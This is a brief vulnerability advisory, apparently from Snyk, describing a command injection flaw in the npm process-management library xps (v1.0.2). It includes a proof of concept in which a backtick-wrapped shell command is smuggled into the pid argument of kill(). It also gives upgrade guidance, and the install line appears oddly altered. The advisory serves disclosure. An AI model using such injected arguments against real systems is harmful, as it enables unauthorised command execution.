xps is a cross-platform library for listing and killing processes.
Affected versions of this package are vulnerable to Command Injection. The argument
pid is used to build the command that is passed to the
child_process.exec function without any sanitization.
PoC by Alessio (d3lla)
create a directory for testing
mkdir poc cd poc/
install latest vulnerable xps module (v1.0.2):
npm i email@example.com
const ps = require('xps'); ps.kill('`touch HACKED;`').fork();
make sure that the HACKED file does not exist:
the HACKED file is created:
xpsto version 1.0.3 or higher.
- Snyk ID
- 23 Jul, 2020
- 24 Jul, 2020